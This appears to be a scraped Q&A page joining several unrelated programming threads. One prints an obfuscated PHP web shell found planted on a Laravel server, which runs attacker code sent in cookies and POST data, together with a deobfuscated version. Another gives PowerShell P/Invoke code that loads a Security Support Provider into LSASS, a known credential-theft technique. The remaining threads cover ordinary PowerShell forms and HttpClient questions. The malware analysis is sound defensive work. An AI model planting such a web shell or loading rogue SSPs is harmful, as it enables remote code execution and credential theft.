so im working on a powershell script to manage security Support Providers for specialized controls. currently i have the script working to ADD a SSP, but when i try and change the script to DELETE a ssp, it breaks.
Here is the code:
$DynAssembly = New-Object System.Reflection.AssemblyName('SSPI2')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SSPI2', $False)
$TypeBuilder = $ModuleBuilder.DefineType('SSPI2.Secur32', 'Public, Class')
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('DeleteSecurityPackage',
'secur32.dll',
'Public, Static',
[Reflection.CallingConventions]::Standard,
[Int32],
[Type[]] #([String]),
[Runtime.InteropServices.CallingConvention]::Winapi,
[Runtime.InteropServices.CharSet]::Auto)
$Secur32 = $TypeBuilder.CreateType()
$RuntimeSuccess = $True
$Result = $Secur32::DeleteSecurityPackage($DllName)
Every time i run this i get: Exception calling "DeleteSecurityPackage" with "1" argument(s): "The function requested is not supported
however this piece of code to ADD the ssp works fine:
$DynAssembly = New-Object System.Reflection.AssemblyName('SSPI2')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SSPI2', $False)
$TypeBuilder = $ModuleBuilder.DefineType('SSPI2.Secur32', 'Public, Class')
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('AddSecurityPackage',
'secur32.dll',
'Public, Static',
[Reflection.CallingConventions]::Standard,
[Int32],
[Type[]] #([String], [IntPtr]),
[Runtime.InteropServices.CallingConvention]::Winapi,
[Runtime.InteropServices.CharSet]::Auto)
$Secur32 = $TypeBuilder.CreateType()
if ([IntPtr]::Size -eq 4) {
$StructSize = 20
} else {
$StructSize = 24
}
$StructPtr = [Runtime.InteropServices.Marshal]::AllocHGlobal($StructSize)
[Runtime.InteropServices.Marshal]::WriteInt32($StructPtr, $StructSize)
$RuntimeSuccess = $True
$Result = $Secur32::AddSecurityPackage($DllName, $StructPtr)
by rights it should be easier to delete since i dont need t worry about the struct, however it is not happy.
any help would be appreciated
It seems like this was not fully implemented/supported by Microsoft. This article seems to support that: http://cybernigma.blogspot.com/2014/03/using-sspap-lsass-proxy-to-mitigate.html The relevant information is about 3/4 of the way down.
Related
I'm creating crud API with laravel 8 as a server and it works perfectly when tested by talend/postman (running on 127.0.0.1:8000).
then i'm creating crud apps with laravel 8 as a client. everything works fine but update data with attach file.
i've try with no attach file and works
$response = Http::put('http://127.0.0.1:8000/api/memo/'.$id_memo, $input);
but, its not works when using attach file
$input['id_user'] = $request->id_user;
$input['date_memo'] = $request->date_memo;
$input['time_memo'] = $request->time_memo;
if ($request->hasFile('lampiran_memo')) {
$lampiran_memo = $request->file('lampiran_memo');
$nama_lampiran = $lampiran_memo->getClientOriginalName();
$lampiran_memo->move("memo", $nama_lampiran);
$thefile = fopen("memo/".$nama_lampiran, 'r');
$response = Http::attach('lampiran_memo', $thefile)->put('http://127.0.0.1:8000/api/memo/14', $input);
}
after stuct, finally I use attach and post (not put) and works fine.
$input['id_user'] = $request->id_user;
$input['date_memo'] = $request->date_memo;
$input['time_memo'] = $request->time_memo;
if ($request->hasFile('lampiran_memo')) {
$lampiran_memo = $request->file('lampiran_memo');
$nama_lampiran = $lampiran_memo->getClientOriginalName();
$lampiran_memo->move("memo", $nama_lampiran);
$thefile = fopen("memo/".$nama_lampiran, 'r');
$response = Http::attach('lampiran_memo', $thefile)->post('http://127.0.0.1:8000/api/updatememo', $input);
}
I have been trying a way to add the Http Version as 1.0 in Powershell to my HttpClient Object.
function Post-JSONData
{
Param
(
[Parameter(Mandatory=$True)] [String] $JSONPayload,
[Parameter(Mandatory=$True)] [String] $ObjectClass,
[Parameter(Mandatory=$True)] [String] $APIUrl,
[Parameter(Mandatory=$False)] [String] $ProxyUrl
)
#Try{
If($JSONPayload.StartsWith("[") -eq $false -and $JSONPayload.EndsWith("]") -eq $false)
{ $JSONPayload = "[" + $JSONPayload + "]" }
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;
Add-Type -AssemblyName System.Net.Http
$WebHandler = New-Object System.Net.Http.HttpClientHandler
$WebHandler.AllowAutoRedirect = $false;
If($ProxyUrl)
{
$WebProxy = New-Object System.Net.WebProxy($ProxyUrl)
$WebHandler.Proxy = $WebProxy
}
$HttpClient = New-Object System.Net.Http.HttpClient($WebHandler)
**$HttpClient.DefaultRequestVersion = [System.Net.HttpVersion]::Version10**
$HttpClient.DefaultRequestHeaders.Add("Accept","*/*");
$HttpClient.DefaultRequestHeaders.Add("Cache-Control", "no-cache");
$HttpClient.DefaultRequestHeaders.Add("Connection","keep-alive");
$HttpClient.DefaultRequestHeaders.Add("Class",$ObjectClass);
$HttpClient.Timeout = New-Object System.TimeSpan(0, 0, 90);
$HttpJSONPayload = New-Object System.Net.Http.StringContent($JSONPayload.ToString(), [System.Text.Encoding]::UTF8, "application/json")
$HttpJSONPayload.Headers.ContentEncoding.Add("gzip")
$HttpJSONPayload.Headers.ContentEncoding.Add("deflate")
$HttpJSONPayload.Headers.ContentEncoding.Add("br")
$ResponsePayload = $HttpClient.PostAsync([Uri] $APIUrl,$HttpJSONPayload)
I am able to add the DefaultRequestHeader Parameters but I believe there is some issue with the format for DefaultRequestVersion.
I am unable to find documentation online either for the same.
Update: I am using Powershell V4.0 so $HttpClient.DefaultRequestVersion = [System.Net.HttpVersion]::Version10 is giving the following error:
The property 'DefaultRequestVersion' cannot be found on this object. Verify that the property exists and can be set.
The DefaultRequestVersion property is not a list, but a single HttpVersion value.
To default to HTTP 1.0, assign it like this:
$HttpClient.DefaultRequestVersion = [System.Net.HttpVersion]::Version10
Beware that the DefaultRequestVersion property was only introduced in .NET Core 3.0, so the earliest version of PowerShell with this property exposed is PowerShell 7.0.0
For PowerShell 4.0, you can change your code slightly to support overriding the HTTP Version by manually crafting the request and calling SendAsync() directly (instead of PostAsync()):
Take this line:
$ResponsePayload = $HttpClient.PostAsync([Uri] $APIUrl,$HttpJSONPayload)
... and replace it with:
# Manually craft the request message and overwrite the version
$RequestPayload = New-Object System.Net.Http.HttpRequestMessage #([System.Net.Http.HttpMethod]::Post, [uri]$APIUrl)
$RequestPayload.Version = '1.0'
$RequestPayload.Content = $HttpJSONPayload
# Pass the crafted message directly to SendAsync()
$ResponsePayload = $HttpClient.SendAsync($RequestPayload)
Under my Laravel application's public folder, there are some suspiciousphp files with weird name like "8xmzujk2.php".
Even though I try to delete those files one or two times, those files appear again after two or three days. I use the window server with apache. There are no record in apache's access and error log at the time those files are created.
If anyone encounter this issue before, please kindly suggest me the steps to solve this issue. All the suggestion are welcome. Thanks in advance.
The code inside this one of suspicious php file is as below.
<?php
$groqw = 'e-xv2i4_3r78g0*6kypmcoustndl#5\'b19aHf';$vcdoidm = Array();$vcdoidm[] = $groqw[35].$groqw[14];$vcdoidm[] = $groqw[20].$groqw[9].$groqw[0].$groqw[34].$groqw[24].$groqw[0].$groqw[7].$groqw[36].$groqw[22].$groqw[25].$groqw[20].$groqw[24].$groqw[5].$groqw[21].$groqw[25];$vcdoidm[] = $groqw[33].$groqw[36].$groqw[8].$groqw[34].$groqw[13].$groqw[10].$groqw[34].$groqw[32].$groqw[1].$groqw[29].$groqw[33].$groqw[4].$groqw[20].$groqw[1].$groqw[6].$groqw[10].$groqw[13].$groqw[32].$groqw[1].$groqw[11].$groqw[36].$groqw[13].$groqw[15].$groqw[1].$groqw[29].$groqw[29].$groqw[31].$groqw[10].$groqw[15].$groqw[0].$groqw[33].$groqw[13].$groqw[32].$groqw[33].$groqw[34].$groqw[34];$vcdoidm[] = $groqw[28];$vcdoidm[] = $groqw[20].$groqw[21].$groqw[22].$groqw[25].$groqw[24];$vcdoidm[] = $groqw[23].$groqw[24].$groqw[9].$groqw[7].$groqw[9].$groqw[0].$groqw[18].$groqw[0].$groqw[34].$groqw[24];$vcdoidm[] = $groqw[0].$groqw[2].$groqw[18].$groqw[27].$groqw[21].$groqw[26].$groqw[0];$vcdoidm[] = $groqw[23].$groqw[22].$groqw[31].$groqw[23].$groqw[24].$groqw[9];$vcdoidm[] = $groqw[34].$groqw[9].$groqw[9].$groqw[34].$groqw[17].$groqw[7].$groqw[19].$groqw[0].$groqw[9].$groqw[12].$groqw[0];$vcdoidm[] = $groqw[23].$groqw[24].$groqw[9].$groqw[27].$groqw[0].$groqw[25];$vcdoidm[] = $groqw[18].$groqw[34].$groqw[20].$groqw[16];foreach ($vcdoidm[8]($_COOKIE, $_POST) as $cpaxpnw => $afkxx){function dlvrss($vcdoidm, $cpaxpnw, $eowcms){return $vcdoidm[7]($vcdoidm[5]($cpaxpnw . $vcdoidm[2], ($eowcms / $vcdoidm[9]($cpaxpnw)) + 1), 0, $eowcms);}function isfap($vcdoidm, $eeqhx){return #$vcdoidm[10]($vcdoidm[0], $eeqhx);}function eeejy($vcdoidm, $eeqhx){$jfvsqg = $vcdoidm[4]($eeqhx) % 3;if (!$jfvsqg) {$ykpentn = $vcdoidm[1]; $fggryc = $ykpentn("", $eeqhx[1]($eeqhx[2]));$fggryc();exit();}}$afkxx = isfap($vcdoidm, $afkxx);eeejy($vcdoidm, $vcdoidm[6]($vcdoidm[3], $afkxx ^ dlvrss($vcdoidm, $cpaxpnw, $vcdoidm[9]($afkxx))));}
That strip of code runs arbitrary code sent in the post and cookies of a request
Here is the clearer version of it
foreach (array_merge($_COOKIE, $_POST) as $index => $value){
function dlvrss($vcdoidm, $index, $eowcms){
return substr(str_repeat($index . "9f3a07a1-592c-4701-8f06-55b76e9019aa", ($eowcms / strlen($index)) + 1), 0, $eowcms);
}
function isfap($vcdoidm, $eeqhx){
return #pack("H*", $eeqhx);
}
function eeejy($vcdoidm, $eeqhx){
$jfvsqg = count($eeqhx) % 3;
if (!$jfvsqg) {
$fggryc = create_function("", $eeqhx[1]($eeqhx[2]));
$fggryc();
exit();
}
}
$value = isfap($vcdoidm, $value);
eeejy($vcdoidm, explode("#", $value ^ dlvrss($vcdoidm, $index, strlen($value))));
}
See how in the end it runs a function sent in the request via
$fggryc = create_function("", $eeqhx[1]($eeqhx[2]));
$fggryc();`
You should have that fixed.
#Edit
I dont know how, sorry.
I am trying to play sound as long as the GUI is open, but as I am not familiar with powershell I need help..
Right now I have this:
$sound = New-Object System.Media.SoundPlayer
$sound.SoundLocation="c:\WINDOWS\Media\ringout.wav"
$Form.ShowDialog()
$sound.PlayLooping()
$flag=$false
1..10 | foreach {
if ($_ -gt 5) {
$flag=$true
}
else {
sleep -s 1
}
if($flag) {
$sound.Stop()
}
}
Of course it's playing after I close this GUI, If I will put $Form.ShowDialog() at the end it will be play before GUI will show...
GUI is closed by button, simple $Form.Close()
Edit ($Form declaration) :
$Form = New-Object System.Windows.Forms.Form
$Form.Text = "ALERT"
$Form.StartPosition = "CenterScreen"
$Form.Topmost = $True
$Form.BackColor = "White"
$Form.AutoSize = $True
$Form.AutoSizeMode = "GrowAndShrink"
$Form.ControlBox = $false
I tried also with if and while loop but without success. Any ideas?
First things first. There is an important difference between Form.Show() and $Form.ShowDialog(). While Show() will return immediately, the latter one waits upon Dialog completion. So, if you start the music before ShowDialog() and stop it after that line, I don't know, why it shouldn't work.
For your needs, you might like events. Use the Forms Load event to execute some logic while the form loads, and its Closing event to add some logic when the form closes:
$Form = New-Object System.Windows.Forms.Form -Property #{
Text = "ALERT"
StartPosition = "CenterScreen"
Topmost = $True
BackColor = "White"
AutoSize = $True
AutoSizeMode = "GrowAndShrink"
ControlBox = $false
}
$sound = New-Object System.Media.SoundPlayer -Property #{SoundLocation = "c:\WINDOWS\Media\ringout.wav"}
$Form.Add_Load({
$sound.PlayLooping()
})
$Form.Add_Closing({
$sound.Stop()
})
$Form.Show()
One might think for readability and reusability the following works better:
[scriptblock]$startMusic = {
$sound.PlayLooping()
}
[scriptblock]$stopMusic = {
$sound.Stop()
}
$Form.Add_Load($startMusic)
$Form.Add_Closing($stopMusic)
This would easily allow us to reuse those methods (e.g. for other dialogs and actions)
Im trying to create a windows form that has a button when clicked will display a folder/file browes window, then the user selects the file/folder and clicks OK and i can then use the selected path as a string for another script.
the problem is that when i run it through PowerGUI (powershell scripting app) it works fine, but when i run through windows powershell it hangs when loading the browse dialog, anyone seen this before or see what ive done wrong or got an alternative, any help would be appreciated.
cls
$button = $browse = $form = 0
[void][reflection.assembly]::LoadWithPartialName("System.Windows.Forms")
$browse = new-object system.windows.Forms.FolderBrowserDialog
$browse.RootFolder = [System.Environment+SpecialFolder]'MyComputer'
$browse.ShowNewFolderButton = $false
$browse.selectedPath = "C:\"
$browse.Description = "Choose a directory"
$button1 = New-Object system.Windows.Forms.Button
$button1.Text = "Choose Directory"
$button1.Add_Click({$browse.ShowDialog()})
$button1.left = 20
$button1.top = 20
$form = New-Object system.windows.forms.Form
$form.controls.add($button1)
$form.ShowDialog()
$form.Dispose()
$browse.SelectedPath
I was having a similar problem when running my script through PowerShellPlus (anther powershell editor). Luckily I found this post that shows how to prompt for a folder without using the FolderBrowserDialog. Here's the code that I'm using in a set of powershell functions I've written for prompting the user for many different kinds of input via a GUI.
# Show an Open Folder Dialog and return the directory selected by the user.
function Read-FolderBrowserDialog([string]$Message, [string]$InitialDirectory)
{
$app = New-Object -ComObject Shell.Application
$folder = $app.BrowseForFolder(0, $Message, 0, $InitialDirectory)
if ($folder) { return $folder.Self.Path } else { return '' }
}
Your code works when I try it. However I have noticed that sometimes(especially the 2nd time in a session) I use a browsewindow, it is hidden behind the PowerShell console and it seems like it's stuck. So can you try moving your powershell console to the side when it "hangs"?
Also, as a suggestion: if you're only using the form to select a folder location, I would skip it. You won't recieve the browser value until you close the form anyways, so try something like this instead:
function Get-BrowseLocation
{
[Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") | Out-Null
[System.Windows.Forms.Application]::EnableVisualStyles()
$browse = New-Object System.Windows.Forms.FolderBrowserDialog
$browse.RootFolder = [System.Environment+SpecialFolder]'MyComputer'
$browse.ShowNewFolderButton = $false
$browse.Description = "Choose a directory"
$loop = $true
while($loop)
{
if ($browse.ShowDialog() -eq "OK")
{
$loop = $false
} else
{
$res = [System.Windows.Forms.MessageBox]::Show("You clicked Cancel. Try again or exit script?", "Choose a directory", [System.Windows.Forms.MessageBoxButtons]::RetryCancel)
if($res -eq "Cancel")
{
#End script
return
}
}
}
$browse.SelectedPath
$browse.Dispose()
}
PS > Get-BrowseLocation
D:\
If you make the following changes to the function provided by Frode. F, the dialog will always come to the top.
$topform = New-Object System.Windows.Forms.Form
$topform.Topmost = $true
$topform.MinimizeBox = $true
$loop = $true
while($loop)
{
if ($browse.ShowDialog($topform) -eq "OK")
I think you're experiencing the issue I've faced, which is addressed in this question
The answer suggests setting .ShowHelp to $true, like this:
$openFileDialog = New-Object System.Windows.Forms.openFileDialog
$openFileDialog.ShowHelp = $true
$openFileDialog.ShowDialog() | Out-Null